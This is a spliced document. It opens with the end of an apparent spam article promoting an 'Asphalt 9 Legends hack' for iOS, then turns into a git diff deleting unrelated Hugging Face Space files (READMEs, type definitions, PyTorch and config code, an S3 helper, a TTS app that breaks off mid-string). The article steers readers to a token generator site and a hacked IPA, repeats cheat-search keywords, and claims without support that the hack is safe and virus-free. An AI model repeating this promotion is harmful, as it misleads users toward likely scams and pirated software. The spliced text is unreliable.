    In this article, we showed you two methods to download and use Asphalt 9 Legends hack on iOS devices. The first method is using NovaGames website, which is an online generator that can give you unlimited tokens and credits for free. The second method is using Archive.org website, which is a web archive that can provide you with a hacked IPA file that you can install on your device using Cydia Impactor or AltStore. We also gave you some tips and tricks for using the hack effectively and safely.

    -

    asphalt 9 legends cheats ios no jailbreak
    -asphalt 9 legends mod apk download for iphone
    -asphalt 9 legends unlimited tokens and credits hack ios
    -asphalt 9 legends free hack tool online generator ios
    -asphalt 9 legends ipa file hacked by iosgods.com
    -asphalt 9 legends hack without human verification ios
    -asphalt 9 legends cheat codes for iphone and ipad
    -asphalt 9 legends hack app download ios
    -asphalt 9 legends hack version download for ios
    -asphalt 9 legends hack no survey no password ios
    -asphalt 9 legends hack cydia tweak ios
    -asphalt 9 legends hack with lucky patcher ios
    -asphalt 9 legends hack using ifunbox ios
    -asphalt 9 legends hack reddit ios
    -asphalt 9 legends hack youtube video ios
    -asphalt 9 legends hack easy and fast ios
    -asphalt 9 legends hack working 100% ios
    -asphalt 9 legends hack safe and secure ios
    -asphalt 9 legends hack latest update ios
    -asphalt 9 legends hack best tips and tricks ios
    -asphalt 9 legends hack how to get free cars ios
    -asphalt 9 legends hack unlock all tracks and modes ios
    -asphalt 9 legends hack unlimited nitro and speed ios
    -asphalt 9 legends hack customize your car ios
    -asphalt 9 legends hack multiplayer mode ios
    -asphalt 9 legends hack offline mode ios
    -asphalt 9 legends hack no root or jailbreak required ios
    -asphalt 9 legends hack support all devices and platforms ios
    -asphalt 9 legends hack novagames.org review ios
    -asphalt 9 legends hack megatut.com guide ios

    -

    We hope you found this article helpful and informative. If you want to try out Asphalt 9 Legends hack on your iOS device, we invite you to visit NovaGames website and follow their instructions. You will be amazed by how much fun and excitement you can have with Asphalt 9 Legends hack.

    -

    Thank you for reading this article. Please share your feedback and comments below. And don't forget to share this article with your friends who may also be interested in Asphalt 9 Legends hack.

    -

    FAQs

    -

    Here are some frequently asked questions about Asphalt 9 Legends hack:

    -
      -
    1. Is Asphalt 9 Legends hack safe to use?
    2. -
    3. Yes, it is safe to use as long as you follow the instructions and don't abuse it. NovaGames website uses encryption and proxy servers to protect your account from detection and ban. Archive.org website provides verified and tested IPA files that are free from viruses and malware.

    4. -
    5. Does Asphalt 9 Legends hack work on other platforms?
    6. -
    7. No, it only works on iOS devices. If you want to use it on Android or PC, you need to find another hack.

    8. -
    9. Do I need to jailbreak my device to use Asphalt 9 Legends hack?
    10. -
    11. No, you don't need to jailbreak your device to use NovaGames online generator. However, you need to jailbreak your device or use a sideloading app to install the hacked IPA file from Archive.org website.

    12. -
    13. How often do I need to update Asphalt 9 Legends hack?
    14. -
    15. You need to update Asphalt 9 Legends hack whenever there is a new version of the game available. You can check NovaGames website or Archive.org website for updates.

    16. -
    17. Where can I get more information about Asphalt 9 Legends hack?
    18. -
    19. You can get more information about Asphalt 9 Legends hack by visiting NovaGames website or contacting their support team. You can also read the reviews and comments of other users who have used the hack.

    20. -
    -
    -

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/fffiloni/Image-Caption-2-Shap-E/README.md b/spaces/fffiloni/Image-Caption-2-Shap-E/README.md deleted file mode 100644 index 9db4d6ccd4163ce55701bb1b9022c3e7767c0560..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/Image-Caption-2-Shap-E/README.md +++ /dev/null @@ -1,17 +0,0 @@ ---- -title: Image Caption to Shap-E -emoji: 🧢 -colorFrom: yellow -colorTo: blue -sdk: gradio -sdk_version: 3.47.1 -python_version: 3.10.11 -app_file: app.py -pinned: false -license: mit -duplicated_from: hysts/Shap-E ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference - -https://arxiv.org/abs/2305.02463 \ No newline at end of file diff --git a/spaces/fffiloni/Music_Source_Separation/bytesep/dataset_creation/create_evaluation_audios/__init__.py b/spaces/fffiloni/Music_Source_Separation/bytesep/dataset_creation/create_evaluation_audios/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/@types/node/ts4.8/dom-events.d.ts b/spaces/fffiloni/controlnet-animation-doodle/node_modules/@types/node/ts4.8/dom-events.d.ts deleted file mode 100644 index b9c1c3aa4f0d337eb151caf6ac77306ed739acb8..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/@types/node/ts4.8/dom-events.d.ts +++ /dev/null @@ -1,126 +0,0 @@ -export {}; // Don't export anything! - -//// DOM-like Events -// NB: The Event / EventTarget / EventListener implementations below were copied -// from lib.dom.d.ts, then edited to reflect Node's documentation at -// https://nodejs.org/api/events.html#class-eventtarget. -// Please read that link to understand important implementation differences. - -// This conditional type will be the existing global Event in a browser, or -// the copy below in a Node environment. -type __Event = typeof globalThis extends { onmessage: any, Event: any } -? {} -: { - /** This is not used in Node.js and is provided purely for completeness. */ - readonly bubbles: boolean; - /** Alias for event.stopPropagation(). This is not used in Node.js and is provided purely for completeness. */ - cancelBubble: () => void; - /** True if the event was created with the cancelable option */ - readonly cancelable: boolean; - /** This is not used in Node.js and is provided purely for completeness. */ - readonly composed: boolean; - /** Returns an array containing the current EventTarget as the only entry or empty if the event is not being dispatched. This is not used in Node.js and is provided purely for completeness. */ - composedPath(): [EventTarget?] - /** Alias for event.target. */ - readonly currentTarget: EventTarget | null; - /** Is true if cancelable is true and event.preventDefault() has been called. */ - readonly defaultPrevented: boolean; - /** This is not used in Node.js and is provided purely for completeness. */ - readonly eventPhase: 0 | 2; - /** The `AbortSignal` "abort" event is emitted with `isTrusted` set to `true`. The value is `false` in all other cases. */ - readonly isTrusted: boolean; - /** Sets the `defaultPrevented` property to `true` if `cancelable` is `true`. */ - preventDefault(): void; - /** This is not used in Node.js and is provided purely for completeness. */ - returnValue: boolean; - /** Alias for event.target. */ - readonly srcElement: EventTarget | null; - /** Stops the invocation of event listeners after the current one completes. */ - stopImmediatePropagation(): void; - /** This is not used in Node.js and is provided purely for completeness. */ - stopPropagation(): void; - /** The `EventTarget` dispatching the event */ - readonly target: EventTarget | null; - /** The millisecond timestamp when the Event object was created. */ - readonly timeStamp: number; - /** Returns the type of event, e.g. "click", "hashchange", or "submit". */ - readonly type: string; -}; - -// See comment above explaining conditional type -type __EventTarget = typeof globalThis extends { onmessage: any, EventTarget: any } -? {} -: { - /** - * Adds a new handler for the `type` event. Any given `listener` is added only once per `type` and per `capture` option value. - * - * If the `once` option is true, the `listener` is removed after the next time a `type` event is dispatched. - * - * The `capture` option is not used by Node.js in any functional way other than tracking registered event listeners per the `EventTarget` specification. - * Specifically, the `capture` option is used as part of the key when registering a `listener`. - * Any individual `listener` may be added once with `capture = false`, and once with `capture = true`. - */ - addEventListener( - type: string, - listener: EventListener | EventListenerObject, - options?: AddEventListenerOptions | boolean, - ): void; - /** Dispatches a synthetic event event to target and returns true if either event's cancelable attribute value is false or its preventDefault() method was not invoked, and false otherwise. */ - dispatchEvent(event: Event): boolean; - /** Removes the event listener in target's event listener list with the same type, callback, and options. */ - removeEventListener( - type: string, - listener: EventListener | EventListenerObject, - options?: EventListenerOptions | boolean, - ): void; -}; - -interface EventInit { - bubbles?: boolean; - cancelable?: boolean; - composed?: boolean; -} - -interface EventListenerOptions { - /** Not directly used by Node.js. Added for API completeness. Default: `false`. */ - capture?: boolean; -} - -interface AddEventListenerOptions extends EventListenerOptions { - /** When `true`, the listener is automatically removed when it is first invoked. Default: `false`. */ - once?: boolean; - /** When `true`, serves as a hint that the listener will not call the `Event` object's `preventDefault()` method. Default: false. */ - passive?: boolean; -} - -interface EventListener { - (evt: Event): void; -} - -interface EventListenerObject { - handleEvent(object: Event): void; -} - -import {} from 'events'; // Make this an ambient declaration -declare global { - /** An event which takes place in the DOM. */ - interface Event extends __Event {} - var Event: typeof globalThis extends { onmessage: any, Event: infer T } - ? T - : { - prototype: __Event; - new (type: string, eventInitDict?: EventInit): __Event; - }; - - /** - * EventTarget is a DOM interface implemented by objects that can - * receive events and may have listeners for them. - */ - interface EventTarget extends __EventTarget {} - var EventTarget: typeof globalThis extends { onmessage: any, EventTarget: infer T } - ? T - : { - prototype: __EventTarget; - new (): __EventTarget; - }; -} diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/cors/README.md b/spaces/fffiloni/controlnet-animation-doodle/node_modules/cors/README.md deleted file mode 100644 index 732b847ed97bd13599fba587e6bbbec9df1ecdf8..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/cors/README.md +++ /dev/null @@ -1,243 +0,0 @@ -# cors - -[![NPM Version][npm-image]][npm-url] -[![NPM Downloads][downloads-image]][downloads-url] -[![Build Status][travis-image]][travis-url] -[![Test Coverage][coveralls-image]][coveralls-url] - -CORS is a node.js package for providing a [Connect](http://www.senchalabs.org/connect/)/[Express](http://expressjs.com/) middleware that can be used to enable [CORS](http://en.wikipedia.org/wiki/Cross-origin_resource_sharing) with various options. - -**[Follow me (@troygoode) on Twitter!](https://twitter.com/intent/user?screen_name=troygoode)** - -* [Installation](#installation) -* [Usage](#usage) - * [Simple Usage](#simple-usage-enable-all-cors-requests) - * [Enable CORS for a Single Route](#enable-cors-for-a-single-route) - * [Configuring CORS](#configuring-cors) - * [Configuring CORS Asynchronously](#configuring-cors-asynchronously) - * [Enabling CORS Pre-Flight](#enabling-cors-pre-flight) -* [Configuration Options](#configuration-options) -* [Demo](#demo) -* [License](#license) -* [Author](#author) - -## Installation - -This is a [Node.js](https://nodejs.org/en/) module available through the -[npm registry](https://www.npmjs.com/). Installation is done using the -[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally): - -```sh -$ npm install cors -``` - -## Usage - -### Simple Usage (Enable *All* CORS Requests) - -```javascript -var express = require('express') -var cors = require('cors') -var app = express() - -app.use(cors()) - -app.get('/products/:id', function (req, res, next) { - res.json({msg: 'This is CORS-enabled for all origins!'}) -}) - -app.listen(80, function () { - console.log('CORS-enabled web server listening on port 80') -}) -``` - -### Enable CORS for a Single Route - -```javascript -var express = require('express') -var cors = require('cors') -var app = express() - -app.get('/products/:id', cors(), function (req, res, next) { - res.json({msg: 'This is CORS-enabled for a Single Route'}) -}) - -app.listen(80, function () { - console.log('CORS-enabled web server listening on port 80') -}) -``` - -### Configuring CORS - -```javascript -var express = require('express') -var cors = require('cors') -var app = express() - -var corsOptions = { - origin: 'http://example.com', - optionsSuccessStatus: 200 // some legacy browsers (IE11, various SmartTVs) choke on 204 -} - -app.get('/products/:id', cors(corsOptions), function (req, res, next) { - res.json({msg: 'This is CORS-enabled for only example.com.'}) -}) - -app.listen(80, function () { - console.log('CORS-enabled web server listening on port 80') -}) -``` - -### Configuring CORS w/ Dynamic Origin - -```javascript -var express = require('express') -var cors = require('cors') -var app = express() - -var whitelist = ['http://example1.com', 'http://example2.com'] -var corsOptions = { - origin: function (origin, callback) { - if (whitelist.indexOf(origin) !== -1) { - callback(null, true) - } else { - callback(new Error('Not allowed by CORS')) - } - } -} - -app.get('/products/:id', cors(corsOptions), function (req, res, next) { - res.json({msg: 'This is CORS-enabled for a whitelisted domain.'}) -}) - -app.listen(80, function () { - console.log('CORS-enabled web server listening on port 80') -}) -``` - -If you do not want to block REST tools or server-to-server requests, -add a `!origin` check in the origin function like so: - -```javascript -var corsOptions = { - origin: function (origin, callback) { - if (whitelist.indexOf(origin) !== -1 || !origin) { - callback(null, true) - } else { - callback(new Error('Not allowed by CORS')) - } - } -} -``` - -### Enabling CORS Pre-Flight - -Certain CORS requests are considered 'complex' and require an initial -`OPTIONS` request (called the "pre-flight request"). An example of a -'complex' CORS request is one that uses an HTTP verb other than -GET/HEAD/POST (such as DELETE) or that uses custom headers. To enable -pre-flighting, you must add a new OPTIONS handler for the route you want -to support: - -```javascript -var express = require('express') -var cors = require('cors') -var app = express() - -app.options('/products/:id', cors()) // enable pre-flight request for DELETE request -app.del('/products/:id', cors(), function (req, res, next) { - res.json({msg: 'This is CORS-enabled for all origins!'}) -}) - -app.listen(80, function () { - console.log('CORS-enabled web server listening on port 80') -}) -``` - -You can also enable pre-flight across-the-board like so: - -```javascript -app.options('*', cors()) // include before other routes -``` - -### Configuring CORS Asynchronously - -```javascript -var express = require('express') -var cors = require('cors') -var app = express() - -var whitelist = ['http://example1.com', 'http://example2.com'] -var corsOptionsDelegate = function (req, callback) { - var corsOptions; - if (whitelist.indexOf(req.header('Origin')) !== -1) { - corsOptions = { origin: true } // reflect (enable) the requested origin in the CORS response - } else { - corsOptions = { origin: false } // disable CORS for this request - } - callback(null, corsOptions) // callback expects two parameters: error and options -} - -app.get('/products/:id', cors(corsOptionsDelegate), function (req, res, next) { - res.json({msg: 'This is CORS-enabled for a whitelisted domain.'}) -}) - -app.listen(80, function () { - console.log('CORS-enabled web server listening on port 80') -}) -``` - -## Configuration Options - -* `origin`: Configures the **Access-Control-Allow-Origin** CORS header. Possible values: - - `Boolean` - set `origin` to `true` to reflect the [request origin](http://tools.ietf.org/html/draft-abarth-origin-09), as defined by `req.header('Origin')`, or set it to `false` to disable CORS. - - `String` - set `origin` to a specific origin. For example if you set it to `"http://example.com"` only requests from "http://example.com" will be allowed. - - `RegExp` - set `origin` to a regular expression pattern which will be used to test the request origin. If it's a match, the request origin will be reflected. For example the pattern `/example\.com$/` will reflect any request that is coming from an origin ending with "example.com". - - `Array` - set `origin` to an array of valid origins. Each origin can be a `String` or a `RegExp`. For example `["http://example1.com", /\.example2\.com$/]` will accept any request from "http://example1.com" or from a subdomain of "example2.com". - - `Function` - set `origin` to a function implementing some custom logic. The function takes the request origin as the first parameter and a callback (which expects the signature `err [object], allow [bool]`) as the second. -* `methods`: Configures the **Access-Control-Allow-Methods** CORS header. Expects a comma-delimited string (ex: 'GET,PUT,POST') or an array (ex: `['GET', 'PUT', 'POST']`). -* `allowedHeaders`: Configures the **Access-Control-Allow-Headers** CORS header. Expects a comma-delimited string (ex: 'Content-Type,Authorization') or an array (ex: `['Content-Type', 'Authorization']`). If not specified, defaults to reflecting the headers specified in the request's **Access-Control-Request-Headers** header. -* `exposedHeaders`: Configures the **Access-Control-Expose-Headers** CORS header. Expects a comma-delimited string (ex: 'Content-Range,X-Content-Range') or an array (ex: `['Content-Range', 'X-Content-Range']`). If not specified, no custom headers are exposed. -* `credentials`: Configures the **Access-Control-Allow-Credentials** CORS header. Set to `true` to pass the header, otherwise it is omitted. -* `maxAge`: Configures the **Access-Control-Max-Age** CORS header. Set to an integer to pass the header, otherwise it is omitted. -* `preflightContinue`: Pass the CORS preflight response to the next handler. -* `optionsSuccessStatus`: Provides a status code to use for successful `OPTIONS` requests, since some legacy browsers (IE11, various SmartTVs) choke on `204`. - -The default configuration is the equivalent of: - -```json -{ - "origin": "*", - "methods": "GET,HEAD,PUT,PATCH,POST,DELETE", - "preflightContinue": false, - "optionsSuccessStatus": 204 -} -``` - -For details on the effect of each CORS header, read [this](http://www.html5rocks.com/en/tutorials/cors/) article on HTML5 Rocks. - -## Demo - -A demo that illustrates CORS working (and not working) using jQuery is available here: [http://node-cors-client.herokuapp.com/](http://node-cors-client.herokuapp.com/) - -Code for that demo can be found here: - -* Client: [https://github.com/TroyGoode/node-cors-client](https://github.com/TroyGoode/node-cors-client) -* Server: [https://github.com/TroyGoode/node-cors-server](https://github.com/TroyGoode/node-cors-server) - -## License - -[MIT License](http://www.opensource.org/licenses/mit-license.php) - -## Author - -[Troy Goode](https://github.com/TroyGoode) ([troygoode@gmail.com](mailto:troygoode@gmail.com)) - -[coveralls-image]: https://img.shields.io/coveralls/expressjs/cors/master.svg -[coveralls-url]: https://coveralls.io/r/expressjs/cors?branch=master -[downloads-image]: https://img.shields.io/npm/dm/cors.svg -[downloads-url]: https://npmjs.org/package/cors -[npm-image]: https://img.shields.io/npm/v/cors.svg -[npm-url]: https://npmjs.org/package/cors -[travis-image]: https://img.shields.io/travis/expressjs/cors/master.svg -[travis-url]: https://travis-ci.org/expressjs/cors diff --git a/spaces/fffiloni/lama-video-watermark-remover/saicinpainting/training/losses/perceptual.py b/spaces/fffiloni/lama-video-watermark-remover/saicinpainting/training/losses/perceptual.py deleted file mode 100644 index 8c055c2b327ce7943682af5c5f9394b9fcbec506..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/lama-video-watermark-remover/saicinpainting/training/losses/perceptual.py +++ /dev/null @@ -1,113 +0,0 @@ -import torch -import torch.nn as nn -import torch.nn.functional as F -import torchvision - -from models.ade20k import ModelBuilder -from saicinpainting.utils import check_and_warn_input_range - - -IMAGENET_MEAN = torch.FloatTensor([0.485, 0.456, 0.406])[None, :, None, None] -IMAGENET_STD = torch.FloatTensor([0.229, 0.224, 0.225])[None, :, None, None] - - -class PerceptualLoss(nn.Module): - def __init__(self, normalize_inputs=True): - super(PerceptualLoss, self).__init__() - - self.normalize_inputs = normalize_inputs - self.mean_ = IMAGENET_MEAN - self.std_ = IMAGENET_STD - - vgg = torchvision.models.vgg19(pretrained=True).features - vgg_avg_pooling = [] - - for weights in vgg.parameters(): - weights.requires_grad = False - - for module in vgg.modules(): - if module.__class__.__name__ == 'Sequential': - continue - elif module.__class__.__name__ == 'MaxPool2d': - vgg_avg_pooling.append(nn.AvgPool2d(kernel_size=2, stride=2, padding=0)) - else: - vgg_avg_pooling.append(module) - - self.vgg = nn.Sequential(*vgg_avg_pooling) - - def do_normalize_inputs(self, x): - return (x - self.mean_.to(x.device)) / self.std_.to(x.device) - - def partial_losses(self, input, target, mask=None): - check_and_warn_input_range(target, 0, 1, 'PerceptualLoss target in partial_losses') - - # we expect input and target to be in [0, 1] range - losses = [] - - if self.normalize_inputs: - features_input = self.do_normalize_inputs(input) - features_target = self.do_normalize_inputs(target) - else: - features_input = input - features_target = target - - for layer in self.vgg[:30]: - - features_input = layer(features_input) - features_target = layer(features_target) - - if layer.__class__.__name__ == 'ReLU': - loss = F.mse_loss(features_input, features_target, reduction='none') - - if mask is not None: - cur_mask = F.interpolate(mask, size=features_input.shape[-2:], - mode='bilinear', align_corners=False) - loss = loss * (1 - cur_mask) - - loss = loss.mean(dim=tuple(range(1, len(loss.shape)))) - losses.append(loss) - - return losses - - def forward(self, input, target, mask=None): - losses = self.partial_losses(input, target, mask=mask) - return torch.stack(losses).sum(dim=0) - - def get_global_features(self, input): - check_and_warn_input_range(input, 0, 1, 'PerceptualLoss input in get_global_features') - - if self.normalize_inputs: - features_input = self.do_normalize_inputs(input) - else: - features_input = input - - features_input = self.vgg(features_input) - return features_input - - -class ResNetPL(nn.Module): - def __init__(self, weight=1, - weights_path=None, arch_encoder='resnet50dilated', segmentation=True): - super().__init__() - self.impl = ModelBuilder.get_encoder(weights_path=weights_path, - arch_encoder=arch_encoder, - arch_decoder='ppm_deepsup', - fc_dim=2048, - segmentation=segmentation) - self.impl.eval() - for w in self.impl.parameters(): - w.requires_grad_(False) - - self.weight = weight - - def forward(self, pred, target): - pred = (pred - IMAGENET_MEAN.to(pred)) / IMAGENET_STD.to(pred) - target = (target - IMAGENET_MEAN.to(target)) / IMAGENET_STD.to(target) - - pred_feats = self.impl(pred, return_feature_maps=True) - target_feats = self.impl(target, return_feature_maps=True) - - result = torch.stack([F.mse_loss(cur_pred, cur_target) - for cur_pred, cur_target - in zip(pred_feats, target_feats)]).sum() * self.weight - return result diff --git a/spaces/flatindo/scaler/realesrgan/data/__init__.py b/spaces/flatindo/scaler/realesrgan/data/__init__.py deleted file mode 100644 index a3f8fdd1aa47c12de9687c578094303eb7369246..0000000000000000000000000000000000000000 --- a/spaces/flatindo/scaler/realesrgan/data/__init__.py +++ /dev/null @@ -1,10 +0,0 @@ -import importlib -from basicsr.utils import scandir -from os import path as osp - -# automatically scan and import dataset modules for registry -# scan all the files that end with '_dataset.py' under the data folder -data_folder = osp.dirname(osp.abspath(__file__)) -dataset_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(data_folder) if v.endswith('_dataset.py')] -# import all the dataset modules -_dataset_modules = [importlib.import_module(f'realesrgan.data.{file_name}') for file_name in dataset_filenames] diff --git a/spaces/flax-community/chef-transformer/utils/st.py b/spaces/flax-community/chef-transformer/utils/st.py deleted file mode 100644 index 9b27358e7e70a60d34db3264b5806973338925fc..0000000000000000000000000000000000000000 --- a/spaces/flax-community/chef-transformer/utils/st.py +++ /dev/null @@ -1,10 +0,0 @@ -import streamlit as st - - -def local_css(css_path): - with open(css_path) as f: - st.markdown(f'', unsafe_allow_html=True) - - -def remote_css(css_url): - st.markdown(f'', unsafe_allow_html=True) diff --git a/spaces/florim/MedGPT/autogpt/processing/__init__.py b/spaces/florim/MedGPT/autogpt/processing/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/freestok/corn-diseases/README.md b/spaces/freestok/corn-diseases/README.md deleted file mode 100644 index 872b989a9709a61c89f702858d8f6833bfe21889..0000000000000000000000000000000000000000 --- a/spaces/freestok/corn-diseases/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Corn Diseases -emoji: 👀 -colorFrom: green -colorTo: gray -sdk: gradio -sdk_version: 3.32.0 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/generativeai/bestpics-ms-image-similarity/services/aws_service.py b/spaces/generativeai/bestpics-ms-image-similarity/services/aws_service.py deleted file mode 100644 index ec370bd413d544b5801a6fc1e07347c7cc9d88ee..0000000000000000000000000000000000000000 --- a/spaces/generativeai/bestpics-ms-image-similarity/services/aws_service.py +++ /dev/null @@ -1,29 +0,0 @@ -import os -import boto3 -from PIL import Image -from io import BytesIO - -class AwsService: - def session(): - return boto3.Session( - aws_access_key_id = os.environ.get('AWS_ACCESS_KEY_ID'), - aws_secret_access_key = os.environ.get('AWS_SECRET_ACCESS_KEY'), - region_name=os.environ.get('AWS_REGION') - ) - - def s3_client(): - return AwsService.session().client('s3') - - def get_files_from_s3(bucket, prefix): - results = AwsService.s3_client().list_objects(Bucket=bucket, Prefix=prefix) - if 'Contents' in results: - return results['Contents'] - else: - return [] - - def get_image_from_s3(bucket, key): - file_byte_string = AwsService.s3_client().get_object(Bucket=bucket, Key=key)['Body'].read() - return { - 'key': key.split('/')[-1].split('.')[0], - 'pil': Image.open(BytesIO(file_byte_string)) - } \ No newline at end of file diff --git a/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/configs/_base_/models/upernet_uniformer.py b/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/configs/_base_/models/upernet_uniformer.py deleted file mode 100644 index 41aa4db809dc6e2c508e98051f61807d07477903..0000000000000000000000000000000000000000 --- a/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/configs/_base_/models/upernet_uniformer.py +++ /dev/null @@ -1,43 +0,0 @@ -# model settings -norm_cfg = dict(type='BN', requires_grad=True) -model = dict( - type='EncoderDecoder', - pretrained=None, - backbone=dict( - type='UniFormer', - embed_dim=[64, 128, 320, 512], - layers=[3, 4, 8, 3], - head_dim=64, - mlp_ratio=4., - qkv_bias=True, - drop_rate=0., - attn_drop_rate=0., - drop_path_rate=0.1), - decode_head=dict( - type='UPerHead', - in_channels=[64, 128, 320, 512], - in_index=[0, 1, 2, 3], - pool_scales=(1, 2, 3, 6), - channels=512, - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)), - auxiliary_head=dict( - type='FCNHead', - in_channels=320, - in_index=2, - channels=256, - num_convs=1, - concat_input=False, - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)), - # model training and testing settings - train_cfg=dict(), - test_cfg=dict(mode='whole')) \ No newline at end of file diff --git a/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/mmcv/parallel/data_parallel.py b/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/mmcv/parallel/data_parallel.py deleted file mode 100644 index 79b5f69b654cf647dc7ae9174223781ab5c607d2..0000000000000000000000000000000000000000 --- a/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/mmcv/parallel/data_parallel.py +++ /dev/null @@ -1,89 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -from itertools import chain - -from torch.nn.parallel import DataParallel - -from .scatter_gather import scatter_kwargs - - -class MMDataParallel(DataParallel): - """The DataParallel module that supports DataContainer. - - MMDataParallel has two main differences with PyTorch DataParallel: - - - It supports a custom type :class:`DataContainer` which allows more - flexible control of input data during both GPU and CPU inference. - - It implement two more APIs ``train_step()`` and ``val_step()``. - - Args: - module (:class:`nn.Module`): Module to be encapsulated. - device_ids (list[int]): Device IDS of modules to be scattered to. - Defaults to None when GPU is not available. - output_device (str | int): Device ID for output. Defaults to None. - dim (int): Dimension used to scatter the data. Defaults to 0. - """ - - def __init__(self, *args, dim=0, **kwargs): - super(MMDataParallel, self).__init__(*args, dim=dim, **kwargs) - self.dim = dim - - def forward(self, *inputs, **kwargs): - """Override the original forward function. - - The main difference lies in the CPU inference where the data in - :class:`DataContainers` will still be gathered. - """ - if not self.device_ids: - # We add the following line thus the module could gather and - # convert data containers as those in GPU inference - inputs, kwargs = self.scatter(inputs, kwargs, [-1]) - return self.module(*inputs[0], **kwargs[0]) - else: - return super().forward(*inputs, **kwargs) - - def scatter(self, inputs, kwargs, device_ids): - return scatter_kwargs(inputs, kwargs, device_ids, dim=self.dim) - - def train_step(self, *inputs, **kwargs): - if not self.device_ids: - # We add the following line thus the module could gather and - # convert data containers as those in GPU inference - inputs, kwargs = self.scatter(inputs, kwargs, [-1]) - return self.module.train_step(*inputs[0], **kwargs[0]) - - assert len(self.device_ids) == 1, \ - ('MMDataParallel only supports single GPU training, if you need to' - ' train with multiple GPUs, please use MMDistributedDataParallel' - 'instead.') - - for t in chain(self.module.parameters(), self.module.buffers()): - if t.device != self.src_device_obj: - raise RuntimeError( - 'module must have its parameters and buffers ' - f'on device {self.src_device_obj} (device_ids[0]) but ' - f'found one of them on device: {t.device}') - - inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids) - return self.module.train_step(*inputs[0], **kwargs[0]) - - def val_step(self, *inputs, **kwargs): - if not self.device_ids: - # We add the following line thus the module could gather and - # convert data containers as those in GPU inference - inputs, kwargs = self.scatter(inputs, kwargs, [-1]) - return self.module.val_step(*inputs[0], **kwargs[0]) - - assert len(self.device_ids) == 1, \ - ('MMDataParallel only supports single GPU training, if you need to' - ' train with multiple GPUs, please use MMDistributedDataParallel' - ' instead.') - - for t in chain(self.module.parameters(), self.module.buffers()): - if t.device != self.src_device_obj: - raise RuntimeError( - 'module must have its parameters and buffers ' - f'on device {self.src_device_obj} (device_ids[0]) but ' - f'found one of them on device: {t.device}') - - inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids) - return self.module.val_step(*inputs[0], **kwargs[0]) diff --git a/spaces/ggwvits/vits-uma-genshin-honkai/app.py b/spaces/ggwvits/vits-uma-genshin-honkai/app.py deleted file mode 100644 index 92ddafdcd240434f58569b0e6964ef331a971dcf..0000000000000000000000000000000000000000 --- a/spaces/ggwvits/vits-uma-genshin-honkai/app.py +++ /dev/null @@ -1,124 +0,0 @@ -import time -import gradio as gr -import utils -import commons -from models import SynthesizerTrn -from text import text_to_sequence -from torch import no_grad, LongTensor -import torch - -hps_ms = utils.get_hparams_from_file(r'./model/config.json') -device = torch.device("cuda" if torch.cuda.is_available() else "cpu") -net_g_ms = SynthesizerTrn( - len(hps_ms.symbols), - hps_ms.data.filter_length // 2 + 1, - hps_ms.train.segment_size // hps_ms.data.hop_length, - n_speakers=hps_ms.data.n_speakers, - **hps_ms.model).to(device) -_ = net_g_ms.eval() -speakers = hps_ms.speakers -model, optimizer, learning_rate, epochs = utils.load_checkpoint(r'./model/G_953000.pth', net_g_ms, None) - -def get_text(text, hps): - text_norm, clean_text = text_to_sequence(text, hps.symbols, hps.data.text_cleaners) - if hps.data.add_blank: - text_norm = commons.intersperse(text_norm, 0) - text_norm = LongTensor(text_norm) - return text_norm, clean_text - -def vits(text, language, speaker_id, noise_scale, noise_scale_w, length_scale): - start = time.perf_counter() - if not len(text): - return "输入文本不能为空!", None, None - text = text.replace('\n', ' ').replace('\r', '').replace(" ", "") - if len(text) > 500: - return f"输入文字过长!{len(text)}>100", None, None - if language == 0: - text = f"[ZH]{text}[ZH]" - elif language == 1: - text = f"[JA]{text}[JA]" - else: - text = f"{text}" - stn_tst, clean_text = get_text(text, hps_ms) - with no_grad(): - x_tst = stn_tst.unsqueeze(0) - x_tst_lengths = LongTensor([stn_tst.size(0)]) - speaker_id = LongTensor([speaker_id]) - audio = net_g_ms.infer(x_tst, x_tst_lengths, sid=speaker_id, noise_scale=noise_scale, noise_scale_w=noise_scale_w, - length_scale=length_scale)[0][0, 0].data.cpu().float().numpy() - - return "生成成功!", (22050, audio), f"生成耗时 {round(time.perf_counter()-start, 2)} s" - -def search_speaker(search_value): - for s in speakers: - if search_value == s: - return s - for s in speakers: - if search_value in s: - return s - -def change_lang(language): - if language == 0: - return 0.6, 0.668, 1.2 - else: - return 0.6, 0.668, 1.1 - -download_audio_js = """ -() =>{{ - let root = document.querySelector("body > gradio-app"); - if (root.shadowRoot != null) - root = root.shadowRoot; - let audio = root.querySelector("#tts-audio").querySelector("audio"); - let text = root.querySelector("#input-text").querySelector("textarea"); - if (audio == undefined) - return; - text = text.value; - if (text == undefined) - text = Math.floor(Math.random()*100000000); - audio = audio.src; - let oA = document.createElement("a"); - oA.download = 